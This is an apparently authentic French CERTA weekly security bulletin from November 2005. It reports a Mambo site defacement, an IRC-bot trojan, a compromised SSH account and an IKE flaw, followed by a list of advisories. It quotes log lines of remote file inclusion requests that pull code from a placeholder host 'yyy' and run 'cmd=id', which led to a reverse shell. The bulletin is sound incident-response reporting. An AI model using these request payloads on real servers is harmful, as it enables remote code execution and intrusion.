1 Activité en cours
1.1 Ports observés
Le tableau 3 et la figure 1 montrent les rejets pour les ports sous surveillance que nous avons constatés sur deux dispositifs de filtrage, entre le 10 et le 24 novembre 2005.
1.2 Incidents traités
1.2.1 Défiguration suite à l'exploitation d'une faille de Mambo
Le CERTA a traité un cas de compromission suite à l'exploitation d'une faille de Mambo (voir avis CERTA-2005-AVI-465). Cette compromission a laissé une trace caractéristique dans les journaux :
xxx.xxx.xxx.xxx - - [22/Nov/2005:12:45:27 +0100] "GET /index.php?_REQUEST[option]=
com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://yyy/code_malveillant?&cmd=id HTTP/1.0" 200 2160 "-" "DataCha0s/2.0"
Le CERT-Renater nous a transmis une trace différente découverte dans un autre cas de compromission par une faille de Mambo :
[18/Nov/2005:10:42:11 +0100] "GET
/includes/mambo.php?include_path=http://yyy/code_malveillant HTTP/1.1"
200 58 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1"
Dans le cas que nous avons traité, le code malveillant téléchargé puis exécuté était un remote reverse shell (terminal distant qui s'ouvre après une connexion sortante effectuée par le serveur piraté). Les intrus ne se sont pas contentés de défigurer le site web, ils ont élevé leurs privilèges à l'aide d'un outil exploitant une faille des noyaux 2.6.11 et antérieurs (dans la série 2.6.x).
Recommandations :
Les techniques d'exploitation de cette faille de Mambo ont été dévoilées avant la parution d'un correctif. Il est très important d'examiner vos journaux pour rechercher d'éventuelles tentatives d'intrusion, et d'appliquer le correctif le plus rapidement possible (ou bien de désactiver cet applicatif).
Nous constatons par ailleurs que les élévations de privilèges par l'exploitation d'une faille du noyau sont de plus en plus fréquentes. Il est important de mettre à jour le noyau.
Les programmes téléchargés sur les serveurs web (suite à l'exploitation de failles applicatives) sont souvent des remote reverse shell. Il est possible que votre serveur web n'ait pas besoin d'effectuer des connexions. Il est donc recommandé de réfléchir à la mise en place de filtrage en sortie.
1.3 Infection virale
Un de nos correspondants nous a signalé l'infection d'un poste par un cheval de Troie ayant, entre autres, des fonctionnalités de bot irc (programme se connectant automatiquement sur des réseaux irc -Internet Relay Chat- et pouvant y recevoir des instructions). Ce cheval de Troie a été découvert après analyse des journaux car il tentait de se connecter à des serveurs irc, et ces connexions étaient bloquées par le pare-feu. La machine infectée était un portable dont les bases de signature antivirale n'était plus à jour, car il avait été retiré du service pendant plus d'un an, avant d'être réintroduit sur le réseau.
Recommandation :
Une pratique simple pour éviter ce type de problème consiste à mettre à jour l'antivirus ainsi que sa base de signatures avant toute reconnexion sur le réseau.1.4 Compromission d'un compte SSH
Un de nos correspondants nous a signalé la compromission d'un compte SSH sur un serveur. Un intrus est parvenu à effectuer une connexion avec les identifiants d'un utilisateur d'un serveur. Nous ignorons pour le moment comment ces identifiants ont pu être volés.
Recommandation :
Il est conseillé de filtrer -dans la mesure du possible- les adresses IP pouvant effectuer des connexions sur le serveur SSH. Il est fréquent de voir des administrateurs se connectant à distance avec un compte SSH sur des serveurs depuis des adresses IP fixes ou appartenant à des plages d'adresses connues. Ce filtrage permet d'éviter de nombreuses attaques, notamment celles effectuant de nombreuses combinaisons d'identifiants.
1.5 Faille IKE présente dans un grand nombre d'équipements
Suite à la publication d'une faille de sécurité dans IKE (Internet Key Exchange) par l'UNIRAS 273756 NISCC ISAKMP le 14 novembre 2005, plusieurs éditeurs majeurs de logiciels ainsi que de constructeurs d'équipements réseau ont publié des correctifs. Le protocole IKE permet l'échange de clefs destinées ensuite à l'établissement de tunnels IPSEC. En fonction de la mise en œuvre spécifique à chaque éditeur, l'exploitation de la vulnérabilité a un impact variable allant jusqu'au redémarrage de la machine vulnérable.Parmi les logiciels vulnérables, on trouve :
- SUN Solaris (CERTA-2005-AVI-456) ;
- Openswan (CERTA-2005-AVI-458) ;
- VPN-1 / Firewall-1 (CERTA-2005-AVI-459).
Parmi les équipements réseau, on trouve :
- Les produits Cisco (CERTA-2005-AVI-454) ;
- les produits Nortel (CERTA-2005-AVI-460).
Recommandation :
Cette liste n'est en aucun cas exhaustive, il convient donc de vérifier sur le site de l'éditeur ou du constructeur concerné si la vulnérabilité affecte un de vos systèmes.2 Rappel des avis et mises à jour émis
Durant la période du 14 au 18 novembre 2005, le CERTA a émis les avis suivants :
- CERTA-2005-AVI-454 : Vulnérabilité de certains produits Cisco
- CERTA-2005-AVI-455 : Multiples vulnérabilités du lecteur RealPlayer
- CERTA-2005-AVI-456 : Vulnérabilité dans Sun Solaris
- CERTA-2005-AVI-457 : Déni de service sur SpamAssassin
- CERTA-2005-AVI-458 : Vulnérabilité de la solution IPsec Openswan
- CERTA-2005-AVI-459 : Vulnérabilité du service vpnd de VPN-1/ Firewall-1
- CERTA-2005-AVI-460 : Vulnérabilité de certains équipements Nortel
- CERTA-2005-AVI-461 : Vulnérabilité des blibliothèques graphiques GTK+2
- CERTA-2005-AVI-462 : Vulnérabilité dans Novell Netmail
Pendant cette même période, la mise à jour suivante a été publiée :
- CERTA-2005-AVI-439-002 : Vulnérablilité dans fetchmail
(ajout de la référence au bulletin de sécurité Debian)
